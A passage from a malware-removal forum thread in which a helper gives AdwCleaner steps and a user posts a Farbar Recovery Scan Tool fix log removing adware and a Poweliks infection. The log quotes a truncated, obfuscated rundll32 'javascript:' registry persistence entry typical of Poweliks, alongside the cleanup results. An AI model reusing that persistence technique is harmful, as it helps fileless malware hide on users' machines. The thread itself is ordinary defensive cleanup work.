  • Close any open windows or browsers.
  • Pause your Anti-Virus program if it is running.
  • Once it starts, click on the Scan button.
  • Let the scan complete itself. This may take a few minutes.
  • Once the scan has finished, it will say "Pending, uncheck elements you don't want to remove.", don't worry about unchecking anything and then click the Clean button. When finished, it will ask to reboot. Please reboot.
  • When the machine has rebooted, a log will be produced. Please copy/paste that in your next reply. Here's how:
    • Click the Report button and the log will open. Copy and Paste the contents of the log file into your next reply.
    This report is also saved at C:\AdwCleaner[R0].txt
Things I need to see in your next post:

Please post each of these logs as a separate reply in this thread.

Fixlog.txt Log

Junkware Removal Tool

AdwCleaner

How is the machine running now?

  • 0

#14
JUSTME1969

JUSTME1969

    Member

  • Topic Starter
  • Member
  • PipPip
  • 32 posts

Should the FRST fix be taking a lot of time? It has been running 15 minutes or more. Just checking to make sure :)


  • 0

#15
JUSTME1969

JUSTME1969

    Member

  • Topic Starter
  • Member
  • PipPip
  • 32 posts

It looks as if Farbar is still running but it did produce a log. Should I close Farbar out and start next step or is this normal? At the top of the Farbar window it says deleting temporary files.

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 01-01-2015
Ran by April at 2015-01-02 01:08:37 Run:1
Running from C:\Users\April\Desktop
Loaded Profile: April (Available profiles: April)
Boot Mode: Normal

==============================================

Content of fixlist:
*****************
Start
CreateRestorePoint:
CloseProcesses:
(Coupons.com Inc.) C:\Program Files\Coupons\CouponPrinterService.exe
C:\Program Files\Coupons
HKLM\...\Run: [] => [X]
HKU\S-1-5-21-692471023-1834078390-643647909-1001\...\MountPoints2: {6f766fac-5ca7-11e1-ba6a-001e33ff5421} - E:\setup.exe -a
HKU\S-1-5-21-692471023-1834078390-643647909-1001\...\MountPoints2: {952aea8a-075f-11e3-a52c-001e33ff5421} - E:\setup.exe -a
HKU\S-1-5-21-692471023-1834078390-643647909-1001\...\MountPoints2: {97b3e8bf-0fa5-11e1-8250-001e33ff5421} - F:\setup.exe -a
HKU\S-1-5-21-692471023-1834078390-643647909-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks!
CHR HKU\S-1-5-21-692471023-1834078390-643647909-1001\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
HKU\S-1-5-21-692471023-1834078390-643647909-1001\Software\Microsoft\Internet Explorer\Main,Start Page Restore = http://www.startpage.com/
FF Plugin HKU\S-1-5-21-692471023-1834078390-643647909-1001: CouponNetwork.com/CMDUniversalCouponPrintActivator -> C:\Users\April\AppData\Roaming\CATALI~2\NPBCSK~1.DLL No File
C:\Users\April\AppData\Roaming\CATALI~2
R2 CouponPrinterService; C:\Program Files\Coupons\CouponPrinterService.exe [152560 2014-02-13] (Coupons.com Inc.)
CustomCLSID: HKU\S-1-5-21-692471023-1834078390-643647909-1001_Classes\CLSID\{039B2CA5-3B41-4D93-AD77-47D3293FC5CB}\InprocServer32 -> C:\Program Files\Skype\Plugin Manager\ezPMUtils.dll No File
CustomCLSID: HKU\S-1-5-21-692471023-1834078390-643647909-1001_Classes\CLSID\{42481700-CF3C-4D05-8EC6-F9A1C57E8DC0}\InprocServer32 -> C:\Program Files\Skype\Plugin Manager\ezPMUtils.dll No File
CustomCLSID: HKU\S-1-5-21-692471023-1834078390-643647909-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-692471023-1834078390-643647909-1001_Classes\CLSID\{AD848A76-F236-5EE2-819B-2BDE7ED40AE7}\InprocServer32 -> C:\Users\April\AppData\Roaming\Catalina Print Savings\npBcsKtTcHW.dll No File
CustomCLSID: HKU\S-1-5-21-692471023-1834078390-643647909-1001_Classes\CLSID\{D0D38C6E-BF64-4C42-840D-3E0019D9F7A6}\InprocServer32 -> C:\Program Files\Skype\Plugin Manager\ezPMUtils.dll No File
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state on
CMD: ipconfig /flushdns
Emptytemp:
Hosts:
End
*****************

Restore point was successfully created.
Processes closed successfully.
[360] C:\Program Files\Coupons\CouponPrinterService.exe => Process closed successfully.
C:\Program Files\Coupons => Moved successfully.
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\ => value deleted successfully.
"HKU\S-1-5-21-692471023-1834078390-643647909-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{6f766fac-5ca7-11e1-ba6a-001e33ff5421}" => Key deleted successfully.
HKCR\CLSID\{6f766fac-5ca7-11e1-ba6a-001e33ff5421} => Key not found.
"HKU\S-1-5-21-692471023-1834078390-643647909-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{952aea8a-075f-11e3-a52c-001e33ff5421}" => Key deleted successfully.
HKCR\CLSID\{952aea8a-075f-11e3-a52c-001e33ff5421} => Key not found.
"HKU\S-1-5-21-692471023-1834078390-643647909-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{97b3e8bf-0fa5-11e1-8250-001e33ff5421}" => Key deleted successfully.
HKCR\CLSID\{97b3e8bf-0fa5-11e1-8250-001e33ff5421} => Key not found.
"HKU\S-1-5-21-692471023-1834078390-643647909-1001\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key deleted successfully.
"HKU\S-1-5-21-692471023-1834078390-643647909-1001\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
"HKU\S-1-5-21-692471023-1834078390-643647909-1001\SOFTWARE\Policies\Google" => Key deleted successfully.
HKU\S-1-5-21-692471023-1834078390-643647909-1001\Software\Microsoft\Internet Explorer\Main\\Start Page Restore => value deleted successfully.
"HKU\S-1-5-21-692471023-1834078390-643647909-1001\Software\MozillaPlugins\CouponNetwork.com/CMDUniversalCouponPrintActivator" => Key deleted successfully.
C:\Users\April\AppData\Roaming\CATALI~2\NPBCSK~1.DLL not found.
"C:\Users\April\AppData\Roaming\CATALI~2" => File/Directory not found.
CouponPrinterService => Service deleted successfully.
"HKU\S-1-5-21-692471023-1834078390-643647909-1001_Classes\CLSID\{039B2CA5-3B41-4D93-AD77-47D3293FC5CB}" => Key deleted successfully.
"HKU\S-1-5-21-692471023-1834078390-643647909-1001_Classes\CLSID\{42481700-CF3C-4D05-8EC6-F9A1C57E8DC0}" => Key deleted successfully.
HKU\S-1-5-21-692471023-1834078390-643647909-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} => Key not found.
"HKU\S-1-5-21-692471023-1834078390-643647909-1001_Classes\CLSID\{AD848A76-F236-5EE2-819B-2BDE7ED40AE7}" => Key deleted successfully.
"HKU\S-1-5-21-692471023-1834078390-643647909-1001_Classes\CLSID\{D0D38C6E-BF64-4C42-840D-3E0019D9F7A6}" => Key deleted successfully.

=========  netsh advfirewall reset =========

Ok.

========= End of CMD: =========

=========  netsh advfirewall set allprofiles state on =========

Ok.

========= End of CMD: =========

=========  ipconfig /flushdns =========

Windows IP Configuration

Successfully flushed the DNS Resolver Cache.

========= End of CMD: =========

C:\Windows\System32\Drivers\etc\hosts => Moved successfully.
Hosts was reset successfully.

 

 

 


Edited by JUSTME1969, 02 January 2015 - 12:44 AM.

  • 0






Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP